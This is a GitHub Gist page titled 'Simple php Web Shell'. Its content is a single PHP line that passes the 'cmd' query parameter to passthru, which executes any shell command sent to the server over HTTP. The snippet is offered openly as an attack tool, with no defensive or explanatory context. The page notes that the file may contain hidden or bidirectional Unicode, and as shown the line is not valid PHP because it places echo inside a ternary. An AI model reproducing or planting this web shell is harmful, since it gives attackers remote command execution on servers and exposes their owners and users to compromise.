Last active
May 13, 2019 19:06
-
-
Save growlnx/ad7ba253411955ab219b7d088b688829 to your computer and use it in GitHub Desktop.
Simple php Web Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
?><?php (isset($_GET['cmd'])) ? passthru($_GET['cmd']) : echo 'NO CMD'; ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment